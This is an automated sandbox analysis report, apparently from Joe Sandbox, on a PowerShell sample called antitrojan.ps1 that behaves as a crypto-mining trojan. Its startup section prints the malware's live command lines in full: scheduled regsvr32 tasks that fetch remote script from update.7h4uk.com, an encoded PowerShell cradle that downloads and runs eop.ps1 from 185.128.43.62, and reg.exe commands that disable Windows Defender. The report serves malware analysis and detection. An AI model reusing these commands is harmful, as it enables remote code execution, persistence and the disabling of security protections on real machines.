ID: 75218 Sample Name: antitrojan.ps1 Cookbook: default.jbs Time: 05:05:26 Date: 04/09/2018 Version: 23.0.0

Table of Contents

Table of Contents 2
Analysis Report antitrojan.ps1 5
  Overview 5
    General Information 5
    Detection 5
    Confidence 6
    Classification 6
    Analysis Advice 7
  Signature Overview 7
    AV Detection: 8
    Exploits: 8
    Bitcoin Miner: 8
    Spreading: 8
    Networking: 8
    System Summary: 8
    Data Obfuscation: 9
    Persistence and Installation Behavior: 9
    Boot Survival: 9
    Hooking and other Techniques for Hiding and Protection: 9
    Malware Analysis System Evasion: 9
    Anti Debugging: 10
    HIPS / PFW / Protection Evasion: 10
    Language, Device and Operating System Detection: 10
    Lowering of HIPS / PFW / Operating System Security Settings: 10
    Remote Access Functionality: 10
  Behavior Graph 10
  Simulations 11
    Behavior and APIs 11
  Antivirus Detection 11
    Initial Sample 11
    Dropped Files 11
    Unpacked PE Files 12
    Domains 12
    URLs 12
  Yara Overview 12
    Initial Sample 12
    PCAP (Network Traffic) 12
    Dropped Files 12
    Memory Dumps 13
    Unpacked PEs 13
  Joe Sandbox View / Context 14
    IPs 14
    Domains 14
    ASN 14
    Dropped Files 14
  Screenshots 15
  Startup 15
  Created / dropped Files 16
  Domains and IPs 19
    Contacted Domains 19
    Contacted URLs 19
    URLs from Memory and Binaries 19
    Contacted IPs 20
      Public 21
      Private 21
  Static File Info 23
    General 23
    File Icon 23
  Network Behavior 23
    Network Port Distribution 23
    TCP Packets 23
    UDP Packets 25
    ICMP Packets 26
    DNS Queries 26
    DNS Answers 26
    HTTP Request Dependency Graph 27
    HTTP Packets 27
  Code Manipulations 32
  Statistics 32
    Behavior 32
  System Behavior 33
    Analysis Process: .exe PID: 3268 Parent PID: 3064 33
      General 33
      File Activities 33
        File Created 33
        File Deleted 34
        File Written 34
        File Read 37
      Registry Activities 40
        Key Value Created 40
    Analysis Process: .exe PID: 3436 Parent PID: 3268 40
      General 40
      Registry Activities 40
    Analysis Process: netsh.exe PID: 3464 Parent PID: 3268 40
      General 40
    Analysis Process: netsh.exe PID: 3484 Parent PID: 3268 41
      General 41
    Analysis Process: netsh.exe PID: 3512 Parent PID: 3268 41
      General 41
    Analysis Process: netsh.exe PID: 3548 Parent PID: 3268 41
      General 41
    Analysis Process: netsh.exe PID: 3592 Parent PID: 3268 42
      General 42
    Analysis Process: schtasks.exe PID: 3780 Parent PID: 3268 42
      General 42
    Analysis Process: schtasks.exe PID: 3796 Parent PID: 3268 42
      General 42
    Analysis Process: schtasks.exe PID: 3808 Parent PID: 3268 42
      General 42
    Analysis Process: taskeng.exe PID: 3816 Parent PID: 848 43
      General 43
    Analysis Process: powercfg.exe PID: 3828 Parent PID: 3268 43
      General 43
    Analysis Process: powercfg.exe PID: 3840 Parent PID: 3268 43
      General 43
    Analysis Process: .exe PID: 3876 Parent PID: 3816 44
      General 44
    Analysis Process: powercfg.exe PID: 3892 Parent PID: 3268 44
      General 44
    Analysis Process: regsvr32.exe PID: 3884 Parent PID: 3816 44
      General 44
    Analysis Process: .EXE PID: 3900 Parent PID: 3268 44
      General 45
    Analysis Process: csc.exe PID: 3968 Parent PID: 3268 45
      General 45
    Analysis Process: NETSTAT.EXE PID: 4004 Parent PID: 3268 45
      General 45
    Analysis Process: cmd.exe PID: 4040 Parent PID: 3876 45
      General 45
    Analysis Process: powershell.exe PID: 1828 Parent PID: 4040 46
      General 46
    Analysis Process: cmd.exe PID: 2120 Parent PID: 3884 46
      General 46
    Analysis Process: powershell.exe PID: 2216 Parent PID: 2120 46
      General 46
    Analysis Process: reg.exe PID: 2504 Parent PID: 1828 47
      General 47
    Analysis Process: reg.exe PID: 2656 Parent PID: 1828 47
      General 47
    Analysis Process: reg.exe PID: 2660 Parent PID: 1828 47
      General 47
    Analysis Process: cohernece.exe PID: 2664 Parent PID: 3268 48
      General 48
    Analysis Process: .exe PID: 2324 Parent PID: 3268 48
      General 48
    Analysis Process: reg.exe PID: 1396 Parent PID: 1828 48
      General 48
    Analysis Process: cohernece.exe PID: 1340 Parent PID: 2664 49
      General 49
    Analysis Process: findstr.exe PID: 756 Parent PID: 3268 49
      General 49
    Analysis Process: powershell.exe PID: 2396 Parent PID: 3268 49
      General 49
    Analysis Process: NETSTAT.EXE PID: 2648 Parent PID: 3268 50
      General 50
    Analysis Process: reg.exe PID: 2212 Parent PID: 2216 50
      General 50
  Disassembly 50
    Code Analysis 50

Copyright Joe Security LLC 2018 Page 2 of 50

Analysis Report antitrojan.ps1

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 75218
Start date: 04.09.2018
Start time: 05:05:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: antitrojan.ps1
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Analysis stop reason:
Detection: MAL
Classification: mal100.winPS1@70/16@13/100
EGA Information: Successful, ratio: 100%
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Found application associated with file extension: .ps1
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiApSrv.exe, WmiPrvSE.exe
• TCP Packets have been reduced to 100
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Skipping Hybrid Code Analysis (implementation is based on Java, ., VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, powershell.exe, powershell.exe

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 100 | 0 - 100 | Report FP / FN |

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |

Classification

Classification chart (radar diagram; categories: Ransomware, Miner, Spreading, Phishing, Evader, Exploiter, Banker, Spyware, Trojan / Bot, Adware; score bands: malicious, suspicious, clean)

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal behavior

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

• AV Detection
• Exploits
• Bitcoin Miner
• Spreading
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Remote Access Functionality

AV Detection:

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Antivirus detection for unpacked file

Yara signature match

Exploits:

Connects to many different private IPs (likely to spread or exploit)

Connects to many different private IPs via SMB (likely to spread or exploit)

Bitcoin Miner:

DNS related to crypto mining pools

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Enumerates the file system

Networking:

Detected TCP or UDP traffic on non-standard ports

Uses netstat to query active network connections and open ports

HTTP GET or POST without a user agent

Uses a known web browser user agent for HTTP communication

Downloads files

Downloads files from webservers via HTTP

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS

System Summary:

Blacklisted process start detected (Windows program)

Powershell connects to network

Powershell drops PE file

Uses powercfg.exe to modify the power settings

Abnormal high CPU Usage

Contains functionality to call native functions

Creates files inside the system directory

Creates mutexes

Reads the hosts file

Tries to load missing DLLs

Uses reg.exe to modify the Windows registry

PE file contains only one section

Classification

Creates files inside the user directory

Creates temporary files

Found command line output

Parts of this application are using Borland Delphi (probably coded in Delphi)

Parts of this application are using the .NET runtime (probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Sample is known by Antivirus

Spawns processes

Uses an in-process (OLE) Automation server

Found graphical window changes (likely an installer)

Uses Microsoft Silverlight

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Binary contains paths to symbols

Data Obfuscation:

Suspicious powershell command line found

Compiles C# or VB.Net code

Entry point lies outside standard sections

PE file contains an invalid checksum

Registers a DLL

Persistence and Installation Behavior:

Creates files in the system32 config directory

Uses cmd line tools excessively to alter registry or file data

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Boot Survival:

Uses schtasks.exe or .exe to add and modify task schedules

Creates or modifies windows services

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)

Malware Analysis System Evasion:

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enumerates the file system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries a list of all running drivers

Queries a list of all running processes

Anti Debugging:

Potentially malicious time measurement code found

Tries to detect sandboxes and other dynamic analysis tools (window names)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates guard pages, often used to prevent reverse engineering and debugging

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Encrypted powershell cmdline option found

Executes SCT (Windows Script Component) via regsvr32

Modifies the context of a thread in another process (thread injection)

Sets debug register (to hijack the execution of another thread)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Language, Device and Operating System Detection:

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Queries the cryptographic machine GUID

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies power options to not sleep / hibernate

Uses netsh to modify the Windows network and firewall settings

Remote Access Functionality:

Found post-exploitation toolkit Empire

Behavior Graph

Behavior Graph ID: 75218
Sample: antitrojan.ps1
Startdate: 04/09/2018
Architecture: WINDOWS
Score: 100
Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious

Behavior graph (figure; recoverable node labels only). Process nodes: powershell.exe, taskeng.exe, cohernece.exe, netsh.exe, regsvr32.exe (2), cmd.exe (2), powershell.exe (2), reg.exe (5), plus 17 other processes. DNS/IP nodes: 192.168.2.1, 192.168.2.10, 100 other IPs or domains. Dropped files: C:\Users\user\AppData\...\java-log-9527.log (PE32), C:\Users\user\AppData\Local\...\cohernece.exe (PE32). Signatures shown on the graph: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Connects to many different private IPs via SMB (likely to spread or exploit); Connects to many different private IPs (likely to spread or exploit); Executes SCT (Windows Script Component) via regsvr32; Tries to detect sandboxes and other dynamic analysis tools (window names); Blacklisted process start detected (Windows program); Powershell connects to network; Creates files in the system32 config directory; Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses cmd line tools excessively to alter registry or file data; 14 other signatures (top level) and 4 other signatures (per child process).

Simulations

Behavior and APIs

Time | Type | Description
05:05:43 | API Interceptor | 101x Sleep call for process: powershell.exe modified
05:05:56 | API Interceptor | 12x Sleep call for process: netsh.exe modified
05:06:14 | API Interceptor | 6x Sleep call for process: schtasks.exe modified
05:06:15 | Task Scheduler | Run new task: System Log Security Check : regsvr32 s>/u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
05:26:00 | Task Scheduler | Run new task: WindowsLogTasks path: regsvr32 s>/u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
05:26:00 | API Interceptor | 3x Sleep call for process: powercfg.exe modified
05:26:01 | API Interceptor | 3x Sleep call for process: taskeng.exe modified
05:26:02 | API Interceptor | 3x Sleep call for process: NETSTAT.EXE modified
05:26:08 | API Interceptor | 872x Sleep call for process: regsvr32.exe modified
05:26:25 | API Interceptor | 2x Sleep call for process: cohernece.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
antitrojan.ps1 | 26% | virustotal |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\java-log-9527.log | 100% | Avira | HEUR/AGEN.1018755
C:\Users\user\AppData\Local\Temp\cohernece.exe | 100% | Avira | TR/Skillis.ojelt
C:\Users\user\AppData\Local\Temp\cohernece.exe | 74% | virustotal |
C:\Users\user\AppData\Local\Temp\java-log-9527.log | 82% | virustotal |
C:\Users\user\AppData\Local\Temp\java-log-9527.log | 66% | metadefender |

Unpacked PE Files

Source | Detection | Scanner | Label
32.2.cohernece.exe.400000.0.unpack | 100% | Avira | DR/Delphi.Gen2
35.1.cohernece.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1018755
35.0.cohernece.exe.400000.6.unpack | 100% | Avira | TR/Patched..Gen

Domains

Source | Detection | Scanner | Label
f4keu.7h4uk.com | 7% | virustotal |

URLs

Source | Detection | Scanner | Label
https://update.7h4uk.com:443/logos.png | 0% | Avira URL Cloud | safe
http://update.7h4uk.( | 0% | Avira URL Cloud | safe
http://185.128.43.62 | 9% | virustotal |
http://185.128.43.62 | 0% | Avira URL Cloud | safe
http://185.128.43.62/eop.ps1 | 12% | virustotal |
http://185.128.43.62/eop.ps1 | 100% | Avira URL Cloud | malware
http://crl.starf | 0% | Avira URL Cloud | safe
https://update.7h4uk.com:443/antivirus.php | 0% | Avira URL Cloud | safe
http://185.128.43.62/eop.ps1t | 0% | Avira URL Cloud | safe
http://update.7h4uk.com:443/cohernece.txt | 0% | Avira URL Cloud | safe
http://$nic/antitrojan.ps1t | 0% | Avira URL Cloud | safe
http://$nic/antivirus.ps1t | 0% | Avira URL Cloud | safe
https://update.7h4uk.com:443/ver.txt | 0% | Avira URL Cloud | safe
http://nic/antivirus.ps1Tn | 0% | Avira URL Cloud | safe
http://$nic/antitrojan.ps1 | 0% | Avira URL Cloud | safe
https://update.7h4uk.com:443/cohernece.txt | 0% | Avira URL Cloud | safe
http://$nic/antivirus.ps1 | 0% | Avira URL Cloud | safe
http://update.7h4uk.com:443/antivirus.php | 10% | virustotal |
http://update.7h4uk.com:443/antivirus.php | 100% | Avira URL Cloud | malware
http://nic/antivirus.ps1T | 0% | Avira URL Cloud | safe
http://nic/antitrojan.ps1T | 0% | Avira URL Cloud | safe
http://update.7h4uk. | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source | Rule | Description | Author
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[2].php | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
C:\Users\user\AppData\Local\Temp\java-log-9527.log | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
C:\Users\user\AppData\Local\Temp\java-log-9527.log | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
C:\Users\user\AppData\Local\Temp\java-log-9527.log | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth

Memory Dumps

Source | Rule | Description | Author
00000023.00000001.1900742410.00400000.00000040.sdmp | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
00000023.00000001.1900742410.00400000.00000040.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
00000023.00000001.1900742410.00400000.00000040.sdmp | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
0000001C.00000002.1931665079.000B4000.00000004.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
0000001C.00000002.1931632180.00090000.00000004.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
00000001.00000003.1684190923.02432000.00000004.sdmp | PowerShell_Mal_HackTool_Gen | Detects PowerShell hack tool samples - generic PE loader | Florian Roth
00000020.00000003.1893324898.00310000.00000040.sdmp | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
00000020.00000003.1893324898.00310000.00000040.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
00000020.00000003.1893324898.00310000.00000040.sdmp | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
00000023.00000000.1793672754.00400000.00000040.sdmp | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
00000023.00000000.1793672754.00400000.00000040.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
00000023.00000000.1793672754.00400000.00000040.sdmp | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
00000019.00000002.1929086913.000B4000.00000004.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
00000019.00000002.1928783139.00090000.00000004.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth

Unpacked PEs

Source | Rule | Description | Author
32.3.cohernece.exe.310000.0.raw.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
32.3.cohernece.exe.310000.0.raw.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
32.3.cohernece.exe.310000.0.raw.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
35.1.cohernece.exe.400000.0.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
35.1.cohernece.exe.400000.0.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
35.1.cohernece.exe.400000.0.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
32.3.cohernece.exe.310000.0.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
32.3.cohernece.exe.310000.0.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
32.3.cohernece.exe.310000.0.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
35.1.cohernece.exe.400000.0.raw.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
35.1.cohernece.exe.400000.0.raw.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
35.1.cohernece.exe.400000.0.raw.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth
35.0.cohernece.exe.400000.6.raw.unpack | ZxShell_Related_Malware_CN_Group_Jul17_2 | Detects a ZxShell related sample from a CN threat group | Florian Roth
35.0.cohernece.exe.400000.6.raw.unpack | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth
35.0.cohernece.exe.400000.6.raw.unpack | CN_disclosed_20180208_Mal1 | Detects malware from disclosed CN malware set | Florian Roth

Joe Sandbox View / Context

IPs

No context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
xmr-eu1.nanopool.org | in3.ps1 | f6e75f0346425209c92217da882fca45d7004e683c8122a48a7b3bcec5356e1d | malicious | 5.196.23.240
xmr-eu1.nanopool.org | info3.ps1 | e92251cb5557d832c64143e30c4948781f60e7d19deac2fcd3b67761abdd2357 | malicious | 51.255.34.118
xmr-eu1.nanopool.org | v1.exe | d7c38aac3bc4c6a47f627d336fb0a44b3237fa80cf2d8c1d77f619f70d041c8e | malicious | 5.196.23.240
xmr-eu1.nanopool.org | 3.exe | 58795849f8c43713aea839e7660998863f58793a14e3c2a8325d914a1a9aea4b | malicious | 164.132.109.110

ASN

No context

Dropped Files

No context

Screenshots

Startup

System is w7
powershell.exe (PID: 3268 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\antitrojan.ps1' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  netsh.exe (PID: 3436 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3464 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3484 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3512 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3548 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block MD5: 784A50A6A09C25F011C3143DDD68E729)
  netsh.exe (PID: 3592 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y MD5: 784A50A6A09C25F011C3143DDD68E729)
  schtasks.exe (PID: 3780 cmdline: 'C:\Windows\system32\schtasks.exe' /create /tn WindowsLogTasks /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc onstart /ru System /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  schtasks.exe (PID: 3796 cmdline: 'C:\Windows\system32\schtasks.exe' /create /tn 'System Log Security Check' /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc minute /mo 20 /ru System /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  schtasks.exe (PID: 3808 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  powercfg.exe (PID: 3828 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  powercfg.exe (PID: 3840 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  powercfg.exe (PID: 3892 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F)
  NETSTAT.EXE (PID: 3900 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  csc.exe (PID: 3968 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)
  NETSTAT.EXE (PID: 4004 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
  cohernece.exe (PID: 2664 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe MD5: 4FE2DE6FBB278E56C23E90432F21F6C8)
    cohernece.exe (PID: 1340 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe MD5: 4FE2DE6FBB278E56C23E90432F21F6C8)
  findstr.exe (PID: 2324 cmdline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight c:\windows\explorer.exe MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
  findstr.exe (PID: 756 cmdline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight 'c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe' MD5: 18F02C555FBC9885DF9DB77754D6BB9B)
  powershell.exe (PID: 2396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  NETSTAT.EXE (PID: 2648 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561)
taskeng.exe (PID: 3816 cmdline: taskeng.exe {639D9766-C719-4F35-A71E-727C31918952} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407)
  regsvr32.exe (PID: 3876 cmdline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    cmd.exe (PID: 4040 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: AD7B9C14083B52BC532FBA5948342B98)
      powershell.exe (PID: 1828 cmdline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        reg.exe (PID: 2504 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
        reg.exe (PID: 2656 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
        reg.exe (PID: 2660 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
        reg.exe (PID: 1396 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
  regsvr32.exe (PID: 3884 cmdline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    cmd.exe (PID: 2120 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: AD7B9C14083B52BC532FBA5948342B98)
